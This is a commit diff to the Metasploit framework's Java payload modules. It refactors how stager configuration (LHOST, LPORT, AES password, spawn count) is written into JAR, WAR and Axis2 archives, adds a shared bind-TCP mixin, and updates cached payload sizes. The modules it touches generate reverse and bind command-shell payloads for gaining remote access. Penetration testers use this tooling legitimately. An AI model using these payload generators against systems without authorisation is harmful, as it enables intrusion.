Fix payload cache size issue, fix shell/bind payloads

Author: OJ

lib/msf/core/payload/java.rb

@@ -58,7 +58,7 @@ def generate_jar(opts={})
 
     jar = Rex::Zip::Jar.new
     jar.add_sub("metasploit") if opts[:random]
-    jar.add_file("metasploit.dat", stager_config)
+    jar.add_file("metasploit.dat", stager_config(opts))
     jar.add_files(paths, MetasploitPayloads.path('java'))
     jar.build_manifest(:main_class => main_class)
 
@@ -105,7 +105,7 @@ def generate_war(opts={})
     zip.add_file('WEB-INF/web.xml', web_xml)
     zip.add_file("WEB-INF/classes/", "")
     zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
-    zip.add_file("WEB-INF/classes/metasploit.dat", stager_config)
+    zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))
 
     zip
   end
@@ -140,7 +140,7 @@ def generate_axis2(opts={})
     zip.add_file('META-INF/', '')
     zip.add_file('META-INF/services.xml', services_xml)
     zip.add_files(paths, MetasploitPayloads.path('java'))
-    zip.add_file('metasploit.dat', stager_config)
+    zip.add_file('metasploit.dat', stager_config(opts))
     zip.build_manifest(:app_name => app_name)
 
     zip

lib/msf/core/payload/java/bind_tcp.rb

@@ -0,0 +1,74 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Complex payload generation for Java that speaks TCP
+#
+###
+
+module Payload::Java::BindTcp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Java
+  include Msf::Payload::UUID::Options
+
+  #
+  # Register Java reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+      Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
+      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+    ])
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_bind_tcp(opts)
+  end
+
+  def include_send_uuid
+      false
+  end
+
+  #
+  # Generate configuration that is to be included in the stager.
+  #
+  def stager_config(opts={})
+    ds = opts[:datastore] || datastore
+    spawn = ds["Spawn"] || 2
+    c =  ""
+    c << "Spawn=#{spawn}\n"
+    pass = ds["AESPassword"] || ''
+    if pass != ""
+      c << "AESPassword=#{pass}\n"
+    end
+    c << "LHOST=#{ds["LHOST"]}\n" if ds["LHOST"]
+    c << "LPORT=#{ds["LPORT"]}\n" if ds["LPORT"]
+
+    c
+  end
+
+  def class_files
+    # TODO: we should handle opts in class_files as well
+    if datastore['AESPassword'] && datastore['AESPassword'].length > 0
+      [
+        ["metasploit", "AESEncryption.class"],
+      ]
+    else
+      []
+    end
+  end
+
+end
+
+end

lib/msf/core/payload/java/reverse_http.rb

@@ -24,7 +24,8 @@ module Payload::Java::ReverseHttp
   def initialize(*args)
     super
     register_advanced_options([
-      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+      Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
+      Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
     ])
   end
 

lib/msf/util/payload_cached_size.rb

@@ -29,7 +29,8 @@ class PayloadCachedSize
       'DLL' => 'external/source/byakugan/bin/XPSP2/detoured.dll',
       'RC4PASSWORD' => 'Metasploit',
       'DNSZONE' => 'corelan.eu',
-      'PEXEC' => '/bin/sh'
+      'PEXEC' => '/bin/sh',
+      'StagerURILength' => 5
     },
     'Encoder'     => nil,
     'DisableNops' => true

modules/payloads/singles/java/shell_reverse_tcp.rb

@@ -16,37 +16,24 @@ module MetasploitModule
   include Msf::Payload::Java
   include Msf::Sessions::CommandShellOptions
 
-  def initialize(info = {})
+  def initialize(info={})
     super(merge_info(info,
-      'Name'          => 'Java Command Shell, Reverse TCP Inline',
-      'Description'   => 'Connect back to attacker and spawn a command shell',
-      'Author'        => [
-          'mihi', # all the hard work
-          'egypt' # msf integration
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => [ 'java' ],
-      'Arch'          => ARCH_JAVA,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
+      'Name'        => 'Java Command Shell, Reverse TCP Inline',
+      'Description' => 'Connect back to attacker and spawn a command shell',
+      'Author'      => ['mihi', 'egypt'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => ['java'],
+      'Arch'        => ARCH_JAVA,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'Payload'     => {'Offsets' => {}, 'Payload' => ''}
       ))
-    @class_files = [
-      [ "metasploit", "Payload.class" ],
-      [ "javapayload", "stage", "Stage.class" ],
-      [ "javapayload", "stage", "StreamForwarder.class" ],
-      [ "javapayload", "stage", "Shell.class" ],
-    ]
   end
 
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
     jar.add_sub("metasploit") if opts[:random]
-    @class_files.each do |path|
+    class_files.each do |path|
       1.upto(path.length - 1) do |idx|
         full = path[0,idx].join("/") + "/"
         if !(jar.entries.map{|e|e.name}.include?(full))
@@ -57,20 +44,29 @@ def generate_jar(opts={})
       jar.add_file(path.join("/"), data)
     end
     jar.build_manifest(:main_class => "metasploit.Payload")
-    jar.add_file("metasploit.dat", stager_config)
+    jar.add_file("metasploit.dat", stager_config(opts))
 
     jar
   end
 
-  def stager_config
+  def stager_config(opts={})
+    ds = opts[:datastore] || datastore
     c =  ""
-    c << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
-    c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
+    c << "LHOST=#{ds["LHOST"]}\n" if ds["LHOST"]
+    c << "LPORT=#{ds["LPORT"]}\n" if ds["LPORT"]
     # Magical, means use stdin/stdout.  Used for debugging
     #c << "LPORT=0\n"
     c << "EmbeddedStage=Shell\n"
 
     c
   end
 
+  def class_files
+    [
+      ['metasploit', 'Payload.class'],
+      ['javapayload', 'stage', 'Stage.class'],
+      ['javapayload', 'stage', 'StreamForwarder.class'],
+      ['javapayload', 'stage', 'Shell.class'],
+    ]
+  end
 end

modules/payloads/stagers/java/bind_tcp.rb

@@ -5,58 +5,27 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/java/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 5105
+  CachedSize = 5118
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
+  include Msf::Payload::Java::BindTcp
 
-  def initialize(info = {})
+  def initialize(info={})
     super(merge_info(info,
-      'Name'          => 'Java Bind TCP Stager',
-      'Description'   => 'Listen for a connection',
-      'Author'        => [
-          'mihi',  # all the hard work
-          'egypt', # msf integration
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'java',
-      'Arch'          => ARCH_JAVA,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'javasocket',
-      'Stager'        => {'Payload' => ""}
-      ))
-
-    register_advanced_options(
-      [
-        Msf::OptString.new('AESPassword', [ false, "Password for encrypting communication", '' ]),
-        Msf::OptInt.new('Spawn', [ true, "Number of subprocesses to spawn", 2 ])
-      ], self.class
-    )
-
-    @class_files = [ ]
-  end
-
-  def stager_config
-    spawn = datastore["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
-    pass = datastore["AESPassword"] || ""
-    if pass != ""
-      c << "AESPassword=#{pass}\n"
-      @class_files = [
-        [ "metasploit", "AESEncryption.class" ],
-      ]
-    else
-      @class_files = [ ]
-    end
-    c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
-
-    c
+      'Name'        => 'Java Bind TCP Stager',
+      'Description' => 'Listen for a connection',
+      'Author'      => ['mihi', 'egypt'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'javasocket',
+      'Stager'      => {'Payload' => ''}
+    ))
   end
-
 end

modules/payloads/stagers/java/reverse_http.rb

@@ -9,7 +9,7 @@
 
 module MetasploitModule
 
-  CachedSize = :dynamic
+  CachedSize = 5123
 
   include Msf::Payload::Stager
   include Msf::Payload::Java

modules/payloads/stagers/java/reverse_https.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = :dynamic
+  CachedSize = 5932
 
   include Msf::Payload::Stager
   include Msf::Payload::Java

modules/payloads/stagers/java/reverse_tcp.rb

@@ -15,7 +15,7 @@ module MetasploitModule
   include Msf::Payload::Java
   include Msf::Payload::Java::ReverseTcp
 
-  def initialize(info = {})
+  def initialize(info={})
     super(merge_info(info,
       'Name'        => 'Java Reverse TCP Stager',
       'Description' => 'Connect back stager',

spec/support/shared/examples/payload_cached_size_is_consistent.rb

@@ -101,7 +101,8 @@
       'DLL' => 'external/source/byakugan/bin/XPSP2/detoured.dll',
       'RC4PASSWORD' => 'Metasploit',
       'DNSZONE' => 'corelan.eu',
-      'PEXEC' => '/bin/sh'
+      'PEXEC' => '/bin/sh',
+      'StagerURILength' => 5
     },
     'Encoder'     => nil,
     'DisableNops' => true